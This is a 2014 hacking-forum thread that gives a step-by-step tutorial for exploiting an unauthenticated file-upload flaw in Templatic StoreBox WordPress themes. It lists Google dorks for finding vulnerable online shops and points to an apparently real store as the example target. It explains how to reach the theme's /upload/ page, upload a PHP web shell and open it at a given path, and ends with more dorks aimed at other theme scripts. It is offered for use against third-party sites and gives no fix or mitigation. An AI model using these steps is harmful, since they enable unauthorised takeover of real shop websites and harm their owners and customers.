Home of WhiteHat CyberArmy
 
HomeFAQSearchMemberlistUsergroupsRegisterLog in

Share | 
 

 [WordPress Templatic Themes]_StoreBox Shell Upload Vulnerability

Go down 
AuthorMessage
W-P
Admin
avatar

Posts : 80
Join date : 2013-11-12
Age : 32
Location : Cyber World

PostSubject: [WordPress Templatic Themes]_StoreBox Shell Upload Vulnerability   Thu Apr 24, 2014 11:09 am

This is an Old Exploit

WordPress Themes Vulnerable to this Exploit:
Code:
WPStore
eShop
KidzStore
Emporium
Store
eCommerce
framework

Tutorial
1. Go to google and search this dork:
Code:
"StoreBox by Templatic" intext:rings
"StoreBox by Templatic" intext:dress
"StoreBox by Templatic" intext:shoes
"StoreBox by Templatic" intext:jacket
"StoreBox by Templatic" intext:jeans
"StoreBox by Templatic" intext:clothes
"StoreBox by Templatic" intext:purse

2. Click on any Website

Example:
[You must be registered and logged in to see this link.]

Right Click and click view page source:
[You must be registered and logged in to see this image.]

3. Locate theme within source code.
[You must be registered and logged in to see this image.]

Which is:
Code:
http://shopshack.net/wp-content/themes/framework/

Notice that the theme is /framework/

We now have found a vulnerable theme to test exploit.

4. Next, add /upload/ to the end of the URL after /framework/
[You must be registered and logged in to see this image.]

5. Use the Uploader to upload your shell. (Supports: .php .txt .html)

Shell Access:
Code:
/wp-content/uploads/products_img/SHELL.php

More Dorks:
Code:
inurl:/wp-content/themes/wpstore
inurl:/wp-content/themes/eShop
inurl:/wp-content/themes/KidzStore
inurl:/wp-content/themes/Emporium
inurl:/wp-content/themes/Store
inurl:/wp-content/themes/eCommerce
inurl:/wp-content/themes/framework
inurl:/wp-content/themes/framework/chkorder.php?color=
inurl:/wp-content/themes/wpstore/thumb.php?src=
inurl:/wp-content/themes/framework/thumb.php?src=
inurl:/wp-content/themes/eCommerce/thumb.php?src=
inurl:/wp-content/themes/framework/getsubcat.php?q=

Credits to: HackForums Smile
Back to top Go down
View user profile http://whitehatcyberarmy.forumotion.com
vvv



Posts : 3
Join date : 2014-04-22

PostSubject: Re: [WordPress Templatic Themes]_StoreBox Shell Upload Vulnerability   Thu Apr 24, 2014 12:11 pm

wow  Smile  thanks for share. I'm newbie!  rabbit 
Back to top Go down
View user profile
W-P
Admin
avatar

Posts : 80
Join date : 2013-11-12
Age : 32
Location : Cyber World

PostSubject: Re: [WordPress Templatic Themes]_StoreBox Shell Upload Vulnerability   Fri Apr 25, 2014 10:21 am

Welcome sir Smile If you have question just post it Smile
Back to top Go down
View user profile http://whitehatcyberarmy.forumotion.com
Sponsored content




PostSubject: Re: [WordPress Templatic Themes]_StoreBox Shell Upload Vulnerability   

Back to top Go down
 
[WordPress Templatic Themes]_StoreBox Shell Upload Vulnerability
Back to top 
Page 1 of 1
 Similar topics
-
» upload imege
» ARE YOU EXCITED ABOUT THE UPCOMING LEGO THEMES?
» Upload Games from Fritz Gui
» Parramatta Toy fair
» Photobucket Problems

Permissions in this forum:You cannot reply to topics in this forum
Home of Ethical WhiteHat CyberArmy :: WhiteHat CyberArmy Community :: Exploits and Vulnerabilities-
Jump to: